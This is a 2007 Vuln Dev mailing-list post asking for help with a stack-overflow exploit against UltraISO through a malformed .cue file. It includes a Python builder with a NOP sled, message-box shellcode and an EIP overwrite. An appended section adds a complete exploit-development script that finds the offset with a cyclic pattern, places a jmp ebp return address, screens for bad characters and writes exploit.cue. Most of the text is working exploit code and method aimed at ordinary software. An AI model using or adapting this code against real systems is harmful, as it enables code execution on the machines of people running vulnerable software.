Vuln Dev
Help developing exploit May 26 2007 05:32PM
KaCo678 aol com (2 replies)
Hi, I was wondering if you would be able to help. I recently found a stack overflow in UltraISO and was trying to write a local exploit for it, but I'm able to find the address where my NOP sled is and everything I've tried hasn't worked. As you seem to be a well-respected member of the community, you might be able to help me. I've asked a few people for help with this one, but I'm still no further forward. I'll explain the best I can. I'm able to control the ECX register and EIP. I attach OllyDbg and open the .cue file, and the program crashes; my EIP points to 90909090 (the NOP sled). Then I press Shift+F9 and I can write anything I want to EIP, so for testing I wrote 41424344, which then wrote to the EIP and ECX registers, at 3299 bytes and then the 4 bytes to write to the registers. I've provided a little test script. It's a mess, but it's just for testing, mate. Also worth noting that we still have to actually fill the rest of the file, so altogether we have 5004 bytes to the file. I hope I'm making sense. I was going to use the bouncing shared library method, but I'm not sure. I changed EIP to the address 0x7C80C75B (jmp ebp), as my NOPs were in there somewhere. I've written a Python script I'm using to test it. Also, if you do take a look, you will need to create a fake .bin file in the same directory. Any help would be great, thanks for your time.



# Builds a malformed .cue sheet: the FILE "..." name field is stuffed with a NOP sled,
# the shellcode, and 4 marker bytes (ABCD) that land in EIP/ECX at the crash.

head_file = b"\x46\x49\x4c\x45\x20\x22"  # Header of file: FILE "

buffer1 = b"\x90" * 4000  # 4000 NOPs

nop = b"\x90" * 189  # 189 NOPs

# 110 bytes of shellcode (MessageBoxA via LoadLibraryA/GetProcAddress, then ExitProcess)
shell = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"
shell += b"\x77\x1d\x80\x7c"
shell += b"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
shell += b"\x28\xac\x80\x7c"
shell += b"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
shell += b"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
shell += b"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
shell += b"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
shell += b"\xff\x4f\x6d\x65\x67\x61\x37\x4e"

pad = b"\x90" * 2  # lost 2 bytes somewhere, made it up

offset = b"\x41\x42\x43\x44"  # ABCD: the 4 bytes that overwrite EIP/ECX

buffer2 = b"\x45" * 701  # fill the rest of the file with junk (EEEE...)

# End of file: .BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00
Head_end = b"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20"
Head_end += b"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"
Head_end += b"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"
Head_end += b"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"

with open("1.cue", "wb") as cue_file:
    cue_file.write(head_file + buffer1 + nop + shell + pad + offset + buffer2 + Head_end)


I'm very confused at the moment, as a few people have told me a few ways to exploit this, but I'm still learning. I was wondering, could I not just point my EIP at my NOP sled so my shellcode gets executed? I'm working with Windows XP SP2. I just can't seem to get to the address of my NOP code.

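The post guesses at the distance to the EIP overwrite ("lost 2 bytes somewhere") and hand-places ABCD. The added example below is not part of the original post or of UltraISO; it shows the usual way to pin that distance down exactly: write a cyclic (Metasploit-style) pattern into the FILE "..." field, read the EIP value the debugger reports at the crash, and look up its little-endian position in the pattern. It then lays out a payload in the same order the post uses (sled, shellcode, return address, filler) and screens it for bytes that a line-oriented .cue parser would likely cut the field on. The CUE framing is copied from the post's script; the offset 4301, the total length, the jmp ebp address 0x7C80C75B and the bad-character set (NUL, quote, CR, LF) are assumptions for illustration, not verified against UltraISO.

```python
import struct

# CUE framing taken from the post's script: FILE "<name>.BIN" BINARY ... INDEX 01 00:00:00
CUE_HEAD = b'FILE "'
CUE_TAIL = b'.BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00'

# Assumed (not from the post): bytes a line-oriented cue parser would likely
# stop on inside the quoted FILE name: NUL ends a C string, the quote closes
# the field, CR and LF end the line.
ASSUMED_BAD_CHARS = b'\x00"\r\n'


def cyclic_pattern(length):
    """Unique 3-byte triples Aa0 Aa1 ... Zz9, truncated to `length` bytes.
    Any 4-byte window is unique within the first 20280 bytes."""
    out = bytearray()
    for u in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in b"abcdefghijklmnopqrstuvwxyz":
            for d in b"0123456789":
                out += bytes((u, l, d))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than %d bytes is not unique" % len(out))


def build_cue(field):
    """Wrap an attacker-controlled FILE name in the cue sheet layout from the post."""
    return CUE_HEAD + field + CUE_TAIL


def eip_seen_in_debugger(field, offset):
    """Model of the overwrite: the 4 bytes at `offset` in the field become EIP.
    x86 is little-endian, so the debugger prints them reversed (ABCD -> 44434241)."""
    return struct.unpack("<I", field[offset:offset + 4])[0]


def pattern_offset(pattern, eip_value):
    """Distance from the start of the field to the EIP overwrite, given the
    EIP value the debugger reported when the pattern file crashed the target."""
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("0x%08x not found in pattern" % eip_value)
    if pattern.find(needle, idx + 1) >= 0:
        raise ValueError("0x%08x occurs more than once in pattern" % eip_value)
    return idx


def find_bad_chars(payload, bad=ASSUMED_BAD_CHARS):
    """(offset, byte) pairs that would likely truncate the FILE field."""
    return sorted((i, b) for i, b in enumerate(payload) if b in bad)


def build_payload(offset, ret_addr, shellcode, total_len):
    """Same order as the post: NOP sled, shellcode, return address at `offset`,
    junk to pad the field to a fixed total length."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    field = b"\x90" * (offset - len(shellcode)) + shellcode
    field += struct.pack("<I", ret_addr)          # little-endian, lands in EIP
    if len(field) > total_len:
        raise ValueError("payload exceeds total length")
    return field + b"\x45" * (total_len - len(field))


if __name__ == "__main__":
    # Stage 1: write pattern.cue, open it in the debugger, note EIP at the crash.
    pattern = cyclic_pattern(5000)
    with open("pattern.cue", "wb") as f:
        f.write(build_cue(pattern))
    # Constructed stand-in for the debugger readout (assumed overwrite at 4301).
    seen = eip_seen_in_debugger(pattern, 4301)
    print("EIP=0x%08x -> offset %d" % (seen, pattern_offset(pattern, seen)))
    # Stage 2: place the assumed jmp ebp address at that offset.
    payload = build_payload(4301, 0x7C80C75B, b"\xcc" * 110, 5008)
    print("bad bytes:", find_bad_chars(payload))
    with open("exploit.cue", "wb") as f:
        f.write(build_cue(payload))
```

Run the script once to produce pattern.cue, open that under OllyDbg, and feed the reported EIP to pattern_offset; the result replaces the guessed "4000 + 189 + 110 + 2" arithmetic. Before writing exploit.cue, run the real shellcode through find_bad_chars: the post's shellcode contains 0x0a and 0x0b, and 0x0a is a line feed, which a cue parser may treat as the end of the FILE line.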
Re: Help developing exploit May 28 2007 02:34PM
Thomas Pollet (thomas pollet gmail com)
Re: Help developing exploit May 26 2007 10:40PM
Valdis Kletnieks vt edu


Copyright 2010, SecurityFocus